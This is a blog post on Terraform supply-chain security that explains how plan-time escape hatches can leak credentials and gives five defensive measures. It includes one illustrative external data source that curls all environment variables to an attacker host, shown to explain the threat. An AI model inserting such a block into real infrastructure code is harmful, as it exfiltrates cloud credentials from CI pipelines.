Why you should care about your Terraform Supply Chain

And 5 things you can do to improve your security posture

Yoriyasu Yano
Fensak Blog

--

Thanks to the proliferation of open source software and easily accessible distribution channels like GitHub, it is almost impossible to build software without depending on a large number of third party libraries.

However, as relying on third party open source software becomes the norm, it becomes increasingly difficult to review the dependencies that you pull in.

When was the last time you took a look at the source code of the different dependencies you are using? How about the transitive dependencies that your direct dependencies pull in? And have you thought about who might be behind some of the software you use? Reviewing and vetting every dependency in your chain is practically impossible.

In this post I want to cover some of the risks of ignoring the software supply chain, especially when it comes to Terraform modules, and some of the things you can do to improve your security posture without having to review and vet every line of code in your dependencies.

Risks of the Software Supply Chain

There is a real risk of vulnerable or malicious software infecting your final package through your dependencies. There have been a few high profile supply chain exploits in the past (the ua-parser-js package hijacking, npm typosquatting, and SolarWinds, to name a few). In each of these cases, a malicious actor was able to spread the effects of their exploit by taking advantage of automated processes in software delivery.

The potential damage that can be done through an infected IaC package is orders of magnitude bigger than with application code, due to the privileged access levels that IaC pipelines require (to deploy arbitrary infrastructure, you need arbitrary access to the cloud platform).

Consider a typical automated deployment process with Dependabot or Renovate, where your organization automatically updates dependencies. These tools are designed to react to released software packages and open PRs in downstream repos that reference the package. Typically, you protect these changes with a CI process that tests them before they are merged in.

In most cases, the CI process you have should be able to detect suspicious behaviors, especially in application code. This is because you typically run application level CI builds and tests in isolated environments with no credentials.

However, with infrastructure code, the amount of validation and testing you can do in isolated environments is limited. As such, it is typical for the pipeline to have broad cloud access to at least a test environment. Depending on the extent of your CI process, this could lead to unintentional credential leaks.

A typical CI test scenario with infrastructure code is a validate -> plan -> apply pipeline. In this pipeline, your CI test consists of a validation phase for structural checks in the code, followed by a dry run (e.g., terraform plan), and then the actual deployment when approved and merged. You may also have a more sophisticated pipeline involving integration tests with a tool like kitchen-terraform or terratest.
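As a sketch, the steps of such a pipeline might look like the following (assuming the standard terraform CLI; the plan file name is arbitrary):

```shell
# Minimal validate -> plan -> apply pipeline (sketch)
set -euo pipefail

terraform init -input=false               # pulls down providers and modules
terraform validate                        # structural checks; needs no cloud access
terraform plan -input=false -out=tfplan   # dry run; needs cloud access

# ...after review, approval, and merge:
terraform apply -input=false tfplan       # the actual deployment
```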

For honest code, this is an effective pipeline for detecting bugs and potential issues in production. However, for malicious code, this can be risky, since both plan and test require access to a cloud environment to test/deploy your code.

Intuitively, a plan feels safe since by definition it is a "dry run" of your code where it doesn't make any changes. What most people neglect is that there are two escape hatches built into Terraform that allow arbitrary code execution even during plan:

  • External data sources: external data sources allow arbitrary execution of shell code during the plan phase. A malicious actor could use curl in an external data source to ship environment variables to an unknown location.
  • Custom providers: custom providers are, by definition, custom code. A malicious actor can run any code in the provider regardless of the phase of execution.
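As an illustration of the first escape hatch, a module could include a data block like the following (using the hashicorp/external provider; the destination URL is made up for this example). The program runs during terraform plan, with full access to the pipeline's environment variables:

```hcl
# Illustrative only: external data sources execute their program during plan.
data "external" "innocuous_looking" {
  program = [
    "sh", "-c",
    # Ships all environment variables to an attacker-controlled host, then
    # prints the empty JSON object that the external protocol expects.
    "curl -s -X POST --data \"$(env)\" https://attacker.example.com/collect; echo '{}'",
  ]
}
```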

What if a malicious actor gets a hold of one of your dependent Terraform modules, and is able to sneak in malicious code that gets released as a patch version update? And what if your Dependabot or Renovate pipeline pulls that in and you execute a plan on it? Would your current pipeline be able to detect such a change, before any damage is done?

And don’t underestimate the damage that could be done with leaked credentials for a test account. Attackers typically harvest leaked cloud credentials to deploy bots, such as DDoS agents or crypto miners, which can greatly inflate your cloud bill and damage your reputation with the vendor.

Note also that this isn’t exploitable only by rogue package maintainers or internal threats. Recently, GitHub had a vulnerability that leaked OAuth credentials, and those credentials could easily have been exploited to manipulate your private trusted libraries, which typically receive less scrutiny than open source dependencies. Usually it only takes one compromised account with write access to trigger a vulnerable pipeline (e.g., open a PR from a branch and then immediately close it).

Organizations have begun to address this problem, primarily for application code. You may have come across solutions like the SLSA framework, developed by Google, the Open Source Security Foundation, and Chainguard, amongst others. These techniques are being employed by the largest and most popular organizations and projects to improve the security posture of their open source dependencies. Each of these attempts to address the problem by providing a framework for securely and automatically enforcing certain rules as you pull down your dependencies.

On the other hand, not much has happened in the Terraform world to address this. This is especially true for module code, where you don’t have the benefit of package management like you do with providers (Terraform implements a lock file for providers, but not for modules).

So what can you do to mitigate the risks without first party help?

Mitigating the risks in Terraform

There are a number of things you can do to improve the security posture of your Terraform pipeline with respect to the supply chain. Here I will list a few of the low-hanging fruit that you should be able to employ with minimal overhead. Note that I will focus mainly on things you can do as a Terraform module user. In a future post, I will cover some things Terraform module maintainers can do to protect their users from potential attacks against their supply chain.

NOTE

When reviewing these recommendations, it is important to be aware that, as with all things security, many recommendations target specific aspects of the problem. Each of these by itself may not provide much coverage and may have certain exploitable flaws (see the caveats of each solution), but when combined, they can drastically improve your security posture. Always practice defense in depth.

Solution 1: Use timed credentials

The first solution is to use timed credentials whenever you need privileged access. For example, for AWS access in GitHub Actions, you can use OIDC based access to get a timed access token.

This can limit the damage done through a credential harvesting attack, where a vulnerable software package exfiltrates access credentials from your CI pipeline to the attacker (e.g., through a custom provider or external data source). The goal is that by the time the attacker has the credentials, they are no longer valid and thus can’t be used against your account.
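For example, a GitHub Actions job might obtain short-lived AWS credentials like this (a sketch; the role ARN and region are placeholders you would replace with your own):

```yaml
on: pull_request

permissions:
  id-token: write   # required for the OIDC token exchange
  contents: read

jobs:
  plan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: aws-actions/configure-aws-credentials@v4
        with:
          role-to-assume: arn:aws:iam::123456789012:role/terraform-plan   # placeholder
          aws-region: us-east-1
      - run: terraform init -input=false && terraform plan -input=false
```

Credentials issued this way expire after a configurable session duration, rather than living indefinitely like a static access key.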

Some caveats:

  • If the credentials are privileged enough (which is often the case in IaC pipelines), an attacker can easily work around this by creating IAM roles or users that they can access later, instead of exfiltrating the credentials themselves.
  • Not every app or cloud that you need to provision supports timed credentials.

Using timed credentials is not a perfect solution to protecting your credentials, but it offers a first line of defense that mitigates some of the common attack vectors.

Solution 2: Rely on commit hashes as opposed to tags

In Terraform, it is commonplace to rely on version tags when pulling in module code. For example, if you are using the vpc module from terraform-aws-modules, you might write your reference as

module "vpc" {
source = "terraform-aws-modules/vpc/aws"
version = "5.1.2"
}

Or when pulling from GitHub directly:

module "vpc" {
source = "github.com/terraform-aws-modules/terraform-aws-vpc?ref=v5.1.2"
}

The problem with version tags is that while they provide semantic significance and make your code readable, they are extremely easy to exploit. Git tags are aliases for a commit hash, which means they can point to any commit on any branch. A malicious actor could push code to an unprotected branch, then push a tag that points to it, which would get picked up by automated release processes.

Or worse, the tag can be changed. A malicious actor could move an existing tag to point to a different commit at a later point in time. You could unsuspectingly pull in malicious modules without changing anything in your code!

NOTE

The Public Terraform Registry is a pass-through to the underlying GitHub repository and doesn’t store an artifact on the platform. When you make a request through the registry, it returns the git URL for cloning the package at the requested ref. As such, the Registry is just as vulnerable to a release tag munging attack as GitHub is.

As an alternative, you could use the associated commit SHA of the tag directly. This trades off the semantic readability with the assurance that you are always pulling the exact commit ref you expect. You could even keep things readable by adding a comment to indicate the version ref, like so:

module "vpc" {
source = "github.com/terraform-aws-modules/terraform-aws-vpc?ref=bf9a89b" # v5.1.2
}

This way, even if the tag is updated, your code still pulls the original reference. This technique is similar to the recommended way to reference third party GitHub Actions.
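To look up the commit SHA behind a tag without cloning the repository, you can use git ls-remote:

```shell
# Lists "<sha>  refs/tags/v5.1.2" without cloning. For annotated tags, the
# peeled entry "refs/tags/v5.1.2^{}" points at the actual commit.
git ls-remote https://github.com/terraform-aws-modules/terraform-aws-vpc refs/tags/v5.1.2
```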

Some caveats:

  • You will need to pull the module directly from git if you wish to use this approach. The Terraform Registry doesn’t have support for directly pulling the commit SHA. This may not be possible if you have other downstream policies that enforce a restricted list of sources.
  • Commit SHAs are not fully immutable either. For example, an admin-level credential can be used to turn off branch protection and force push to remove commits from a protected branch. However, the level of access required to do this is typically much higher in most organizations, especially compared to munging release tags. Additionally, it is much harder to hijack a commit SHA to point to alternative code, which means the worst that could happen is that the module is no longer available.
  • Relying on commit SHAs could increase the risk of human error due to increased cognitive load. E.g., reviewing version bumps takes more effort, since you now need to make sure the commit SHA refers to a release tag instead of a random commit. This could play out both ways. On one hand, the increased load may encourage developers to carefully review every dependency update to make sure the ref refers to a release tag and a protected branch. On the other hand, the increased friction may make developers less likely to do this at all. How this plays out will depend on the team. You can mitigate some of the harmful effects by employing one of the other practices below.

Despite these caveats, using commit SHAs provides a baseline level of protection by guaranteeing that you always pull the same module code, and with good discipline, is semantically no different from using regular version tags.

Solution 3: Add static checks for your dependency sources

In addition to, or in place of, relying on commit SHAs, you can employ static analysis against your Terraform code to vet its sources.

For example, using the terraform-config-inspect go library, you can collect a list of Terraform module dependencies and check each one to make sure that:

  • The ref refers to a semantic version tag.
  • The referred commit is associated with the expected release branch.
  • The expected release branch is protected.

This routine can be embedded in a unit test using the Terratest framework, or implemented as a CLI based linter that runs prior to running terraform plan. This way, you vet the dependencies before any code is executed.
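As a simplified sketch of the first check (using a plain regex in Python rather than the terraform-config-inspect library; the helper name and accepted patterns are my own), you could scan module sources for refs that are neither a semantic version tag nor a commit SHA:

```python
import re

# Matches git-based module sources of the form:
#   source = "github.com/org/repo?ref=v5.1.2"
SOURCE_RE = re.compile(r'source\s*=\s*"([^"]*github\.com[^"?]*)\?ref=([^"&]+)"')

# Accept a semantic version tag, or an abbreviated/full commit SHA.
SEMVER_TAG = re.compile(r"^v?\d+\.\d+\.\d+$")
COMMIT_SHA = re.compile(r"^[0-9a-f]{7,40}$")

def check_refs(terraform_code: str) -> list:
    """Return violation messages for module refs that are not pinned."""
    violations = []
    for match in SOURCE_RE.finditer(terraform_code):
        source, ref = match.groups()
        if not (SEMVER_TAG.match(ref) or COMMIT_SHA.match(ref)):
            violations.append(
                "%s: ref %r is not a version tag or commit SHA" % (source, ref)
            )
    return violations
```

A real implementation would go further and query the Git host's API to confirm the tag sits on a protected release branch, but even this simple form catches refs that point at mutable branches like main.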

Some caveats:

  • The check code can get complex, and will require some hardening to ensure it is testing the right thing.
  • This depends on securing your workflow to ensure that a malicious actor can’t manipulate the pipeline. Most pipelines depend on workflow files defined on a branch, so you will want to make sure that the workflow file can’t be easily updated to skip the static validation step. For example, GitHub Actions has several protection mechanisms that prevent arbitrarily updating the pipeline.

If pulled off well, this check can offer a stronger guarantee than using just the commit SHA for the references, as you can bake in arbitrary conditions to enhance your confidence that the code you are pulling in is trusted.

Solution 4: Add static checks to validate the pulled in Terraform code

The last two approaches are ways to ensure your Terraform dependencies are stable and can’t be easily manipulated. The previous recommendation was a static check on metadata about the source; this recommendation goes one step further and adds static checks on the Terraform code in the dependency itself.

You may be familiar with Terraform policy enforcement tools like OPA, Sentinel, or Checkov. The canonical use case for these is to enforce policies on the plan output, which means they run after damage may already have been done. Running against the plan is necessary for certain policies, as they may depend on computed values that require running the Terraform code.

However, there are ways to use the same tools to run static analysis on the Terraform code itself, even before a plan is executed. This can be useful to enforce a set of simple, yet powerful checks that ensure the safety of the code being pulled in.

For example, here is a way to use OPA to enforce that your Terraform code only includes resources from an approved allowlist of providers:

  1. Run terraform init. This pulls down all the modules, including transitive ones, so that they are available locally for analysis.
  2. Use hcl2json to convert all the terraform code to JSON format.
  3. Write an OPA policy that ensures all the resources and data sources in use in every module come from the allowed provider list.
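As a sketch of the allowlist check in step 3, implemented here in Python instead of a Rego policy (the allowlist contents and function names are illustrative), operating on the JSON structure that hcl2json produces:

```python
ALLOWED_PROVIDERS = {"aws"}  # example allowlist

def provider_of(block_type: str) -> str:
    # By convention, resource and data source types are prefixed with the
    # provider name: "aws_instance" -> "aws", "external" -> "external".
    return block_type.split("_", 1)[0]

def find_violations(module_json: dict) -> list:
    """Flag resources and data sources whose provider is not allowlisted."""
    violations = []
    for block in ("resource", "data"):
        for block_type in module_json.get(block, {}):
            provider = provider_of(block_type)
            if provider not in ALLOWED_PROVIDERS:
                violations.append(
                    "%s %r uses disallowed provider %r" % (block, block_type, provider)
                )
    return violations
```

Running this across every module directory pulled down by terraform init (including the transitive ones under .terraform/modules) would flag, for example, an external data source smuggled into a dependency.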

The main advantage of such checks is to ensure that the code isn’t capable of doing anything arbitrary or harmful at the plan phase. By checking only against the source code, you can catch potential issues even before the pipeline runs plan.

Some caveats:

  • Like with the checks for the source refs, you will want to make sure that the pipeline is locked down so that these checks can’t be bypassed.
  • Depending on what you want to check, the rules can get very complicated and hard to maintain over time. You will need to strike the right balance.

Unlike the other solutions, this check has the advantage that it scans the actual code instead of the references, so it doesn’t matter if the attacker was able to sneak in the code through the pipeline. However, the success of the detection mechanism depends on the quality of the check itself, which can become difficult to test and maintain over time.

Solution 5: Prevent secrets from leaking with automated scanners

Up to this point I focused on Terraform code, but an important aspect of keeping your supply chain secure is to prevent credentials from leaking in the first place.

While it’s difficult to prevent credential leaks from third parties (as in the case of the GitHub OAuth exploit), you could implement scanners that ensure that you don’t leak your credentials in your repositories and published artifacts.

A number of secrets scanners focus on detecting whether a software artifact contains secrets; popular examples include gitleaks, truffleHog, and detect-secrets.

Employing these scanners in your pipeline greatly reduces the risk of developer credentials being leaked and exploited.
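As a toy illustration of what these scanners do under the hood (real scanners ship hundreds of rules plus entropy heuristics; this checks a single well-known pattern), here is a check for AWS access key IDs:

```python
import re

# AWS access key IDs are 20 characters: "AKIA" followed by 16 uppercase
# alphanumeric characters.
AWS_ACCESS_KEY_RE = re.compile(r"\b(AKIA[0-9A-Z]{16})\b")

def scan_for_secrets(text: str) -> list:
    """Return any substrings that look like AWS access key IDs."""
    return AWS_ACCESS_KEY_RE.findall(text)
```

Wired into a pre-commit hook or CI step, a check like this fails the build before the offending commit ever reaches a shared branch.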

Some caveats:

  • These scanners only prevent accidental leakage of credentials through your own distribution channels. They will not prevent third parties from accidentally leaking your credentials (e.g., if a third party GitHub app with access to your org is compromised).
  • The scanners are only checks. That is, they are not a mechanism for preventing secrets from being pushed upstream. Developers may still accidentally leak credentials by pushing to a public branch, and that may go undetected for a long time if no PR is ever opened. It still requires some developer discipline to ensure the scanners also run locally at the pre-commit phase.

Summary

Supply chain security for your Terraform code is just as important as supply chain security for your application code. Even if there isn’t much first party support from HashiCorp for mitigating supply chain vulnerabilities, there are many things you can do to mitigate those risks, as covered above.

Hopefully this gave you some ideas on approaches to improving your security posture. Thanks for reading!

--


Staff level Startup Engineer with 10+ years experience (formerly at Gruntwork)